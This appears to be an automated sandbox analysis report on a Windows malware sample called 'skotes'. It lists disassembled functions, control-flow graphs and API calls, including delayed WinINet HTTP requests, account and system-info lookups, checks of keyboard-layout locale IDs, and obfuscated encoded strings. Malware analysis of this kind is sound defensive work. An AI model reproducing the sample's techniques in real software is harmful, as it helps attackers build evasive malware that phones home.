InitOnceExecuteOnce 12206->12207 12208 73be97 12207->12208 12209 73be9e 12208->12209 12212 756cbb 12208->12212 12209->12202 12213 756cc7 12212->12213 12214 758bec 2 API calls 12213->12214 12215 756cf6 12214->12215 12218 73b5f1 std::_Throw_future_error 12216->12218 12217 758bec 2 API calls 12219 73b69f 12217->12219 12218->12217 12220 73b658 12218->12220 12220->12205 12125 73b8b9 12132 73b7b5 12125->12132 12127 73b906 12144 73b718 12127->12144 12128 73b8e1 Concurrency::details::_Reschedule_chore 12128->12127 12140 73cbae 12128->12140 12131 73b91e 12133 73b7c1 Concurrency::details::_Reschedule_chore 12132->12133 12134 73b7f2 12133->12134 12135 73c6ac GetSystemTimePreciseAsFileTime 12133->12135 12134->12128 12136 73b7d6 12135->12136 12154 722b10 12136->12154 12138 73b7dc __Mtx_unlock 12139 722b10 3 API calls 12138->12139 12139->12134 12141 73cbcc 12140->12141 12142 73cbbc TpCallbackUnloadDllOnCompletion 12140->12142 12141->12127 12142->12141 12145 73b724 Concurrency::details::_Reschedule_chore 12144->12145 12146 73b77e 12145->12146 12147 73c6ac GetSystemTimePreciseAsFileTime 12145->12147 12146->12131 12148 73b739 12147->12148 12149 722b10 3 API calls 12148->12149 12150 73b73f __Mtx_unlock 12149->12150 12151 722b10 3 API calls 12150->12151 12152 73b75c __Cnd_broadcast 12151->12152 12152->12146 12153 722b10 3 API calls 12152->12153 12153->12146 12155 722b1a 12154->12155 12156 722b1c 12154->12156 12155->12138 12157 73c26a 3 API calls 12156->12157 12158 722b22 ___std_exception_copy 12157->12158 12158->12138 11957 756629 11960 7564c7 11957->11960 11962 7564d5 11960->11962 11961 756520 11962->11961 11965 75652b 11962->11965 11970 75a302 GetPEB 11965->11970 11967 756535 11968 75653a GetPEB 11967->11968 11969 75654a 11967->11969 11968->11969 11971 75a31c 11970->11971 11971->11967 12159 73b92e 12160 73b7b5 4 API calls 12159->12160 12161 73b956 12160->12161 12162 73b718 4 API calls 12161->12162 12163 73b96f 12162->12163

                                                Executed Functions

                                                Function 0072BE30 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 313networksleepfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 766 72be30-72be7c 767 72be82-72be86 766->767 768 72c281-72c2a6 call 7380c0 766->768 767->768 770 72be8c-72be90 767->770 773 72c2d4-72c2ec 768->773 774 72c2a8-72c2b4 768->774 770->768 772 72be96-72bf2a Sleep InternetOpenW InternetConnectA call 737a00 call 725c10 770->772 797 72bf2e-72bf4a HttpOpenRequestA 772->797 798 72bf2c 772->798 778 72c2f2-72c2fe 773->778 779 72c238-72c250 773->779 776 72c2b6-72c2c4 774->776 777 72c2ca-72c2d1 call 73d663 774->777 776->777 781 72c34f-72c354 call 756c6a 776->781 777->773 783 72c304-72c312 778->783 784 72c22e-72c235 call 73d663 778->784 785 72c323-72c33f call 73cff1 779->785 786 72c256-72c262 779->786 783->781 793 72c314 783->793 784->779 794 72c268-72c276 786->794 795 72c319-72c320 call 73d663 786->795 793->784 794->781 796 72c27c 794->796 795->785 796->795 803 72bf7b-72bfea call 737a00 call 725c10 call 737a00 call 725c10 797->803 804 72bf4c-72bf5b 797->804 798->797 818 72bfee-72c004 HttpSendRequestA 803->818 819 72bfec 803->819 806 72bf71-72bf78 call 73d663 804->806 807 72bf5d-72bf6b 804->807 806->803 807->806 820 72c006-72c015 818->820 821 72c035-72c05d 818->821 819->818 822 72c017-72c025 820->822 823 72c02b-72c032 call 73d663 820->823 824 72c08e-72c0af InternetReadFile 821->824 825 72c05f-72c06e 821->825 822->823 823->821 829 72c0b5 824->829 827 72c070-72c07e 825->827 828 72c084-72c08b call 73d663 825->828 827->828 828->824 830 72c0c0-72c170 call 754250 829->830
                                                APIs
                                                • Sleep.KERNELBASE(000005DC), ref: 0072BEB8
                                                • InternetOpenW.WININET(00778DC8,00000000,00000000,00000000,00000000), ref: 0072BEC8
                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0072BEEC
                                                • HttpOpenRequestA.WININET(?,00000000), ref: 0072BF35
                                                • HttpSendRequestA.WININET(?,00000000), ref: 0072BFF6
                                                • InternetReadFile.WININET(?,?,000003FF,?), ref: 0072C0A8
                                                • InternetCloseHandle.WININET(?), ref: 0072C187
                                                • InternetCloseHandle.WININET(?), ref: 0072C18F
                                                • InternetCloseHandle.WININET(?), ref: 0072C197
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$invalid stoi argument$stoi argument out of range
                                                • API String ID: 2167506142-2254971868
                                                • Opcode ID: 420a23ae9579ff169170baada88cedd4886a77945224437527f271b51df3e588
                                                • Instruction ID: 914c59c8b89832e69acfdcec066d9c55595b7fcba85acfe9038e9bdcc7edec63
                                                • Opcode Fuzzy Hash: 420a23ae9579ff169170baada88cedd4886a77945224437527f271b51df3e588
                                                • Instruction Fuzzy Hash: 03B116B1A00128DBEB29CF28DC89BDD7BB5EF51304F508599F508972C2DB799AC0CB95
                                                Function 007265E0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1161 7265e0-726639 1235 72663a call 4b40bf4 1161->1235 1236 72663a call 4b40be4 1161->1236 1237 72663a call 4b40c55 1161->1237 1238 72663a call 4b40bb7 1161->1238 1239 72663a call 4b40c72 1161->1239 1240 72663a call 4b40b32 1161->1240 1241 72663a call 4b40bc3 1161->1241 1242 72663a call 4b40bae 1161->1242 1243 72663a call 4b40c88 1161->1243 1244 72663a call 4b40ca9 1161->1244 1245 72663a call 4b40b99 1161->1245 1246 72663a call 4b40c2a 1161->1246 1162 72663f-7266b8 LookupAccountNameA call 737a00 call 725c10 1168 7266ba 1162->1168 1169 7266bc-7266db call 7222c0 1162->1169 1168->1169 1172 72670c-726712 1169->1172 1173 7266dd-7266ec 1169->1173 1176 726715-72671a 1172->1176 1174 726702-726709 call 73d663 1173->1174 1175 7266ee-7266fc 1173->1175 1174->1172 1175->1174 1177 726937 call 756c6a 1175->1177 1176->1176 1179 72671c-726744 call 737a00 call 725c10 1176->1179 1184 72693c call 756c6a 1177->1184 1189 726746 1179->1189 1190 726748-726769 call 7222c0 1179->1190 1188 726941-726946 call 756c6a 1184->1188 1189->1190 1195 72679a-7267ae 1190->1195 1196 72676b-72677a 1190->1196 1202 7267b4-7267ba 1195->1202 1203 726858-72687c 1195->1203 1197 726790-726797 call 73d663 1196->1197 1198 72677c-72678a 1196->1198 1197->1195 1198->1184 1198->1197 1204 7267c0-7267ed call 737a00 call 725c10 1202->1204 1205 726880-726885 1203->1205 1218 7267f1-726818 call 7222c0 1204->1218 1219 7267ef 1204->1219 1205->1205 1206 726887-7268ec call 7380c0 * 2 1205->1206 1216 726919-726936 call 73cff1 1206->1216 1217 7268ee-7268fd 1206->1217 1220 72690f-726916 call 73d663 1217->1220 1221 7268ff-72690d 1217->1221 1228 72681a-726829 1218->1228 1229 726849-72684c 1218->1229 1219->1218 1220->1216 1221->1188 1221->1220 1231 72682b-726839 1228->1231 1232 72683f-726846 call 73d663 1228->1232 1229->1204 1230 726852 1229->1230 1230->1203 1231->1177 1231->1232 1232->1229 1235->1162 1236->1162 1237->1162 1238->1162 1239->1162 1240->1162 1241->1162 1242->1162 1243->1162 1244->1162 1245->1162 1246->1162
                                                APIs
                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00726680
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AccountLookupName
                                                • String ID: GSTmfV==$ISNmfV==$RySfdMLx
                                                • API String ID: 1484870144-2309319047
                                                • Opcode ID: 6949c18e62a1db48184a147c54fa0cfd3d6e30e48455a5dac856b9e2f58146c8
                                                • Instruction ID: 0ca5d2b65f0d7f6a951a210231510adcf81e91258db4d6afe18ebc7b8f57448e
                                                • Opcode Fuzzy Hash: 6949c18e62a1db48184a147c54fa0cfd3d6e30e48455a5dac856b9e2f58146c8
                                                • Instruction Fuzzy Hash: 0A91D5B1900128DBDB28DB28DC89BDDB779EB45304F4045E9E51997282EB399FC4CFA4
                                                Function 007347B0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2516COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00737A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00737AEC
                                                  • Part of subcall function 00737A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00737AF8
                                                  • Part of subcall function 00737A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00737B01
                                                  • Part of subcall function 0072BE30: Sleep.KERNELBASE(000005DC), ref: 0072BEB8
                                                  • Part of subcall function 0072BE30: InternetOpenW.WININET(00778DC8,00000000,00000000,00000000,00000000), ref: 0072BEC8
                                                  • Part of subcall function 0072BE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0072BEEC
                                                  • Part of subcall function 0072BE30: HttpOpenRequestA.WININET(?,00000000), ref: 0072BF35
                                                • std::_Xinvalid_argument.LIBCPMT ref: 00734F92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
                                                • String ID: 2I0$ 3I3eB==$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$KCWUOl==$MGE+$MGI+$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$stoi argument out of range
                                                • API String ID: 4201286991-1982281295
                                                • Opcode ID: 933228a0c53a5a9d57a469fb30b38cd2dba6accd0011bee40f80b99eb281b08d
                                                • Instruction ID: b85d4c52a5f6b09228b5e8aa16e463e1075f8582a9c1866b6798072652c69ea5
                                                • Opcode Fuzzy Hash: 933228a0c53a5a9d57a469fb30b38cd2dba6accd0011bee40f80b99eb281b08d
                                                • Instruction Fuzzy Hash: 8423E371E00258DBEB29DB28CD8979DBB76AB81304F5481D8E049A7287EB395F84CF51
                                                Function 00725EE0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 340COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 921 725ee0-725fde 927 725fe0-725fec 921->927 928 726008-726015 call 73cff1 921->928 929 725ffe-726005 call 73d663 927->929 930 725fee-725ffc 927->930 929->928 930->929 932 726016-72619d call 756c6a call 73e150 call 7380c0 * 5 RegOpenKeyExA 930->932 950 7261a3-726233 call 7540f0 932->950 951 7264b1-7264ba 932->951 981 726239-72623d 950->981 982 72649f-7264ab 950->982 952 7264e7-7264f0 951->952 953 7264bc-7264c7 951->953 957 7264f2-7264fd 952->957 958 72651d-726526 952->958 955 7264c9-7264d7 953->955 956 7264dd-7264e4 call 73d663 953->956 955->956 960 7265d7-7265df call 756c6a 955->960 956->952 962 726513-72651a call 73d663 957->962 963 7264ff-72650d 957->963 964 726553-72655c 958->964 965 726528-726533 958->965 962->958 963->960 963->962 967 726585-72658e 964->967 968 72655e-726569 964->968 972 726535-726543 965->972 973 726549-726550 call 73d663 965->973 978 726590-72659f 967->978 979 7265bb-7265d6 call 73cff1 967->979 976 72657b-726582 call 73d663 968->976 977 72656b-726579 968->977 972->960 972->973 973->964 976->967 977->960 977->976 985 7265b1-7265b8 call 73d663 978->985 986 7265a1-7265af 978->986 988 726243-726279 RegEnumValueA 981->988 989 726499 981->989 982->951 985->979 986->960 986->985 991 726486-72648d 988->991 992 72627f-72629e 988->992 989->982 991->988 997 726493 991->997 996 7262a0-7262a5 992->996 996->996 999 7262a7-7262fb call 7380c0 call 737a00 * 2 call 725d50 996->999 997->989 999->991
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                • API String ID: 0-3963862150
                                                • Opcode ID: f418214252b6f22b535e62dea06aceb690a5407ec9ed426e3752a5911a647913
                                                • Instruction ID: a67892b5ee1d35ae41e56d4579a192ec2bfb9bed98089c453d07f3acae58bf07
                                                • Opcode Fuzzy Hash: f418214252b6f22b535e62dea06aceb690a5407ec9ed426e3752a5911a647913
                                                • Instruction Fuzzy Hash: 21D1B0719002689BEB24DF64CC89BDEB7B9EF04340F5042D9F508E7292DB789BA48F55
                                                Function 00727D30 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 426COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1007 727d30-727db2 call 7540f0 1011 728356-728373 call 73cff1 1007->1011 1012 727db8-727de0 call 737a00 call 725c10 1007->1012 1019 727de2 1012->1019 1020 727de4-727e06 call 737a00 call 725c10 1012->1020 1019->1020 1025 727e0a-727e23 1020->1025 1026 727e08 1020->1026 1029 727e54-727e7f 1025->1029 1030 727e25-727e34 1025->1030 1026->1025 1031 727eb0-727ed1 1029->1031 1032 727e81-727e90 1029->1032 1033 727e36-727e44 1030->1033 1034 727e4a-727e51 call 73d663 1030->1034 1037 727ed3-727ed5 GetNativeSystemInfo 1031->1037 1038 727ed7-727edc 1031->1038 1035 727e92-727ea0 1032->1035 1036 727ea6-727ead call 73d663 1032->1036 1033->1034 1039 728374 call 756c6a 1033->1039 1034->1029 1035->1036 1035->1039 1036->1031 1042 727edd-727ee6 1037->1042 1038->1042 1049 728379-72837f call 756c6a 1039->1049 1047 727f04-727f07 1042->1047 1048 727ee8-727eef 1042->1048 1053 7282f7-7282fa 1047->1053 1054 727f0d-727f16 1047->1054 1051 728351 1048->1051 1052 727ef5-727eff 1048->1052 1051->1011 1057 72834c 1052->1057 1053->1051 1055 7282fc-728305 1053->1055 1058 727f18-727f24 1054->1058 1059 727f29-727f2c 1054->1059 1060 728307-72830b 1055->1060 1061 72832c-72832f 1055->1061 1057->1051 1058->1057 1062 727f32-727f39 1059->1062 1063 7282d4-7282d6 1059->1063 1064 728320-72832a 1060->1064 1065 72830d-728312 1060->1065 1068 728331-72833b 1061->1068 1069 72833d-728349 1061->1069 1066 728019-7282bd call 737a00 call 725c10 call 737a00 call 725c10 call 725d50 call 737a00 call 725c10 call 725730 call 737a00 call 725c10 call 737a00 call 725c10 call 725d50 call 737a00 call 725c10 call 725730 call 737a00 call 725c10 call 737a00 call 725c10 call 725d50 call 737a00 call 725c10 call 725730 call 737a00 call 725c10 call 737a00 call 725c10 call 725d50 call 737a00 call 725c10 call 725730 1062->1066 1067 727f3f-727f9b call 737a00 call 725c10 call 737a00 call 725c10 call 725d50 1062->1067 1070 7282e4-7282e7 1063->1070 1071 7282d8-7282e2 1063->1071 1064->1051 1065->1064 1072 728314-72831e 1065->1072 1106 7282c3-7282cc 1066->1106 1093 727fa0-727fa7 1067->1093 1068->1051 1069->1057 1070->1051 1075 7282e9-7282f5 1070->1075 1071->1057 1072->1051 1075->1057 1095 727fab-727fcb call 758bbe 1093->1095 1096 727fa9 1093->1096 1101 728002-728004 1095->1101 1102 727fcd-727fdc 1095->1102 1096->1095 1101->1106 1107 72800a-728014 1101->1107 1104 727ff2-727fff call 73d663 1102->1104 1105 727fde-727fec 1102->1105 1104->1101 1105->1049 1105->1104 1106->1053 1111 7282ce 1106->1111 1107->1106 1111->1063
                                                APIs
                                                • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00727ED3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoNativeSystem
                                                • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==$Ps
                                                • API String ID: 1721193555-2159040288
                                                • Opcode ID: f34cad91e0c2f7caf97b6be8e59aec1ac96357821790934e762676d9525ca8fc
                                                • Instruction ID: 16564a1f4a9c61c77816a49a3fe3973092ea47fd5b7a9c5a7b50cd7d467a4361
                                                • Opcode Fuzzy Hash: f34cad91e0c2f7caf97b6be8e59aec1ac96357821790934e762676d9525ca8fc
                                                • Instruction Fuzzy Hash: CFE1D6B0E00654DBDB28BB28DD4B3AD7B61AB45720FA44298E415673C3EB3D5E8187D3
                                                Function 00728380 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1343 728380-728401 call 7540f0 1347 728403-728408 1343->1347 1348 72840d-728435 call 737a00 call 725c10 1343->1348 1349 72854f-72856b call 73cff1 1347->1349 1356 728437 1348->1356 1357 728439-72845b call 737a00 call 725c10 1348->1357 1356->1357 1362 72845f-728478 1357->1362 1363 72845d 1357->1363 1366 72847a-728489 1362->1366 1367 7284a9-7284d4 1362->1367 1363->1362 1368 72848b-728499 1366->1368 1369 72849f-7284a6 call 73d663 1366->1369 1370 728501-728522 1367->1370 1371 7284d6-7284e5 1367->1371 1368->1369 1372 72856c-728571 call 756c6a 1368->1372 1369->1367 1376 728524-728526 GetNativeSystemInfo 1370->1376 1377 728528-72852d 1370->1377 1374 7284f7-7284fe call 73d663 1371->1374 1375 7284e7-7284f5 1371->1375 1374->1370 1375->1372 1375->1374 1381 72852e-728535 1376->1381 1377->1381 1381->1349 1383 728537-72853f 1381->1383 1386 728541-728546 1383->1386 1387 728548-72854b 1383->1387 1386->1349 1387->1349 1388 72854d 1387->1388 1388->1349
                                                APIs
                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 00728524
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoNativeSystem
                                                • String ID:
                                                • API String ID: 1721193555-0
                                                • Opcode ID: b7f1173ae53de01e1fbfd4127ee6ce2e4fc1da5c91387035c57c34682b4ca8ed
                                                • Instruction ID: 423f9512d102399a976c91285ac910c26a74f8040d836e14a7a528d4292c5ef6
                                                • Opcode Fuzzy Hash: b7f1173ae53de01e1fbfd4127ee6ce2e4fc1da5c91387035c57c34682b4ca8ed
                                                • Instruction Fuzzy Hash: E8515870D01268DBEB24EF68DD49BDDB774DB45310F504298E814A72C2EF3A9E808B92
                                                Function 00736C70 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 155817035049c5ca7aeaa619b2aaa394aa421b1cebaad954cb9ee5f21750ee2d
                                                • Instruction ID: 07cdb3a159a75a0dcf4ad94a6b87d3856cbda94b7735a63f24455009e43c5d44
